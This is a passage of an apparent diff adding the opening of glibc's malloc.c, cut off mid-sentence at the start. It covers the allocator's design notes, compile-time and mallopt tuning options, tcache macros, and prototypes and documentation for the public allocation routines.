+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
